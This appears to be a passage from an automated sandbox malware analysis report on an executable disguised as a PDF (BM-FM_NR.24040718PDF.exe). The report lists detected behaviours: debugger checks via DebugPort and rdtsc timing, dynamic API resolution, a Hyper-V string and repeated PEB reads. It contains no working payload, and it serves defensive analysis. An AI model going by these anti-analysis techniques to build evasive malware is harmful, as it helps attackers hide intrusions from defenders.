Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp, BM-FM_NR.24040718PDF.exe, 00000002.00000003.13535224569.0000000006905000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\write.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\write.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 rdtsc 2_2_36B21763
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B234E0 NtCreateMutant,LdrInitializeThunk, 2_2_36B234E0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B5D69D mov eax, dword ptr fs:[00000030h] 2_2_36B5D69D
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3690 mov eax, dword ptr fs:[00000030h] 2_2_36BB3690
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F68C mov eax, dword ptr fs:[00000030h] 2_2_36B9F68C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD96E0 mov eax, dword ptr fs:[00000030h] 2_2_36AD96E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD96E0 mov eax, dword ptr fs:[00000030h] 2_2_36AD96E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE56E0 mov eax, dword ptr fs:[00000030h] 2_2_36AE56E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE56E0 mov eax, dword ptr fs:[00000030h] 2_2_36AE56E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE56E0 mov eax, dword ptr fs:[00000030h] 2_2_36AE56E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B756E0 mov eax, dword ptr fs:[00000030h] 2_2_36B756E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B756E0 mov eax, dword ptr fs:[00000030h] 2_2_36B756E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h] 2_2_36B836E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h] 2_2_36B836E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h] 2_2_36B836E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h] 2_2_36B836E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B836E0 mov eax, dword ptr fs:[00000030h] 2_2_36B836E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0D6D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0D6D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE5622 mov eax, dword ptr fs:[00000030h] 2_2_36AE5622
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE5622 mov eax, dword ptr fs:[00000030h] 2_2_36AE5622
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE7623 mov eax, dword ptr fs:[00000030h] 2_2_36AE7623
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1F63F mov eax, dword ptr fs:[00000030h] 2_2_36B1F63F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1F63F mov eax, dword ptr fs:[00000030h] 2_2_36B1F63F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8D62C mov ecx, dword ptr fs:[00000030h] 2_2_36B8D62C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8D62C mov ecx, dword ptr fs:[00000030h] 2_2_36B8D62C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8D62C mov eax, dword ptr fs:[00000030h] 2_2_36B8D62C
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B91623 mov eax, dword ptr fs:[00000030h] 2_2_36B91623
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B91623 mov eax, dword ptr fs:[00000030h] 2_2_36B91623
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B91623 mov eax, dword ptr fs:[00000030h] 2_2_36B91623
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0D600 mov eax, dword ptr fs:[00000030h] 2_2_36B0D600
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0D600 mov eax, dword ptr fs:[00000030h] 2_2_36B0D600
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B69603 mov eax, dword ptr fs:[00000030h] 2_2_36B69603
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F607 mov eax, dword ptr fs:[00000030h] 2_2_36B9F607
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1360F mov eax, dword ptr fs:[00000030h] 2_2_36B1360F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h] 2_2_36B73608
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h] 2_2_36B73608
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h] 2_2_36B73608
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h] 2_2_36B73608
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h] 2_2_36B73608
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B73608 mov eax, dword ptr fs:[00000030h] 2_2_36B73608
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF3660 mov eax, dword ptr fs:[00000030h] 2_2_36AF3660
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF3660 mov eax, dword ptr fs:[00000030h] 2_2_36AF3660
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AF3660 mov eax, dword ptr fs:[00000030h] 2_2_36AF3660
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD7662 mov eax, dword ptr fs:[00000030h] 2_2_36AD7662
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD7662 mov eax, dword ptr fs:[00000030h] 2_2_36AD7662
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD7662 mov eax, dword ptr fs:[00000030h] 2_2_36AD7662
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B75660 mov eax, dword ptr fs:[00000030h] 2_2_36B75660
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6166E mov eax, dword ptr fs:[00000030h] 2_2_36B6166E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6166E mov eax, dword ptr fs:[00000030h] 2_2_36B6166E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6166E mov eax, dword ptr fs:[00000030h] 2_2_36B6166E
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B15654 mov eax, dword ptr fs:[00000030h] 2_2_36B15654
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD64A mov eax, dword ptr fs:[00000030h] 2_2_36ADD64A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADD64A mov eax, dword ptr fs:[00000030h] 2_2_36ADD64A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE3640 mov eax, dword ptr fs:[00000030h] 2_2_36AE3640
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF640 mov eax, dword ptr fs:[00000030h] 2_2_36AFF640
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF640 mov eax, dword ptr fs:[00000030h] 2_2_36AFF640
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AFF640 mov eax, dword ptr fs:[00000030h] 2_2_36AFF640
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE965A mov eax, dword ptr fs:[00000030h] 2_2_36AE965A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE965A mov eax, dword ptr fs:[00000030h] 2_2_36AE965A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB17BC mov eax, dword ptr fs:[00000030h] 2_2_36BB17BC
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAD7A7 mov eax, dword ptr fs:[00000030h] 2_2_36BAD7A7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAD7A7 mov eax, dword ptr fs:[00000030h] 2_2_36BAD7A7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BAD7A7 mov eax, dword ptr fs:[00000030h] 2_2_36BAD7A7
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11796 mov eax, dword ptr fs:[00000030h] 2_2_36B11796
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B11796 mov eax, dword ptr fs:[00000030h] 2_2_36B11796
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB781 mov eax, dword ptr fs:[00000030h] 2_2_36BBB781
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BBB781 mov eax, dword ptr fs:[00000030h] 2_2_36BBB781
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE37E4 mov eax, dword ptr fs:[00000030h] 2_2_36AE37E4
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE77F9 mov eax, dword ptr fs:[00000030h] 2_2_36AE77F9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AE77F9 mov eax, dword ptr fs:[00000030h] 2_2_36AE77F9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F7CF mov eax, dword ptr fs:[00000030h] 2_2_36B9F7CF
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B09723 mov eax, dword ptr fs:[00000030h] 2_2_36B09723
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h] 2_2_36ADB705
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h] 2_2_36ADB705
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h] 2_2_36ADB705
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB705 mov eax, dword ptr fs:[00000030h] 2_2_36ADB705
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED700 mov ecx, dword ptr fs:[00000030h] 2_2_36AED700
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F717 mov eax, dword ptr fs:[00000030h] 2_2_36B9F717
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA970B mov eax, dword ptr fs:[00000030h] 2_2_36BA970B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BA970B mov eax, dword ptr fs:[00000030h] 2_2_36BA970B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3700 mov eax, dword ptr fs:[00000030h] 2_2_36BB3700
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3700 mov eax, dword ptr fs:[00000030h] 2_2_36BB3700
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36BB3700 mov eax, dword ptr fs:[00000030h] 2_2_36BB3700
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F773 mov eax, dword ptr fs:[00000030h] 2_2_36B9F773
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h] 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h] 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h] 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h] 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h] 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B21763 mov eax, dword ptr fs:[00000030h] 2_2_36B21763
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B13740 mov eax, dword ptr fs:[00000030h] 2_2_36B13740
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADF75B mov eax, dword ptr fs:[00000030h] 2_2_36ADF75B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1174A mov eax, dword ptr fs:[00000030h] 2_2_36B1174A
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6174B mov eax, dword ptr fs:[00000030h] 2_2_36B6174B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6174B mov ecx, dword ptr fs:[00000030h] 2_2_36B6174B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B954B0 mov eax, dword ptr fs:[00000030h] 2_2_36B954B0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B954B0 mov ecx, dword ptr fs:[00000030h] 2_2_36B954B0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6D4A0 mov ecx, dword ptr fs:[00000030h] 2_2_36B6D4A0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6D4A0 mov eax, dword ptr fs:[00000030h] 2_2_36B6D4A0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6D4A0 mov eax, dword ptr fs:[00000030h] 2_2_36B6D4A0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1B490 mov eax, dword ptr fs:[00000030h] 2_2_36B1B490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1B490 mov eax, dword ptr fs:[00000030h] 2_2_36B1B490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B85490 mov eax, dword ptr fs:[00000030h] 2_2_36B85490
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F4FD mov eax, dword ptr fs:[00000030h] 2_2_36B9F4FD
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B094FA mov eax, dword ptr fs:[00000030h] 2_2_36B094FA
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B154E0 mov eax, dword ptr fs:[00000030h] 2_2_36B154E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B0F4D0 mov eax, dword ptr fs:[00000030h] 2_2_36B0F4D0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h] 2_2_36B014C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h] 2_2_36B014C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h] 2_2_36B014C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h] 2_2_36B014C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B014C9 mov eax, dword ptr fs:[00000030h] 2_2_36B014C9
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D430 mov eax, dword ptr fs:[00000030h] 2_2_36B9D430
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9D430 mov eax, dword ptr fs:[00000030h] 2_2_36B9D430
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36ADB420 mov eax, dword ptr fs:[00000030h] 2_2_36ADB420
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17425 mov eax, dword ptr fs:[00000030h] 2_2_36B17425
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B17425 mov ecx, dword ptr fs:[00000030h] 2_2_36B17425
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7B420 mov eax, dword ptr fs:[00000030h] 2_2_36B7B420
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B7B420 mov eax, dword ptr fs:[00000030h] 2_2_36B7B420
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h] 2_2_36B6F42F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h] 2_2_36B6F42F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h] 2_2_36B6F42F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h] 2_2_36B6F42F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B6F42F mov eax, dword ptr fs:[00000030h] 2_2_36B6F42F
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B69429 mov eax, dword ptr fs:[00000030h] 2_2_36B69429
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F409 mov eax, dword ptr fs:[00000030h] 2_2_36B9F409
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F478 mov eax, dword ptr fs:[00000030h] 2_2_36B9F478
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD7460 mov eax, dword ptr fs:[00000030h] 2_2_36AD7460
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AD7460 mov eax, dword ptr fs:[00000030h] 2_2_36AD7460
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1D450 mov eax, dword ptr fs:[00000030h] 2_2_36B1D450
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B1D450 mov eax, dword ptr fs:[00000030h] 2_2_36B1D450
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h] 2_2_36AED454
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h] 2_2_36AED454
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h] 2_2_36AED454
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h] 2_2_36AED454
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h] 2_2_36AED454
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h] 2_2_36AED454
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B87591 mov edi, dword ptr fs:[00000030h] 2_2_36B87591
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B19580 mov eax, dword ptr fs:[00000030h] 2_2_36B19580
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B19580 mov eax, dword ptr fs:[00000030h] 2_2_36B19580
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h] 2_2_36B8B58B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h] 2_2_36B8B58B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h] 2_2_36B8B58B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h] 2_2_36B8B58B
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B9F582 mov eax, dword ptr fs:[00000030h] 2_2_36B9F582
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h] 2_2_36AEB5E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B655E0 mov eax, dword ptr fs:[00000030h] 2_2_36B655E0
Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe Code function: 2_2_36B115EF mov eax, dword ptr fs:[00000030h] 2_2_36B115EF
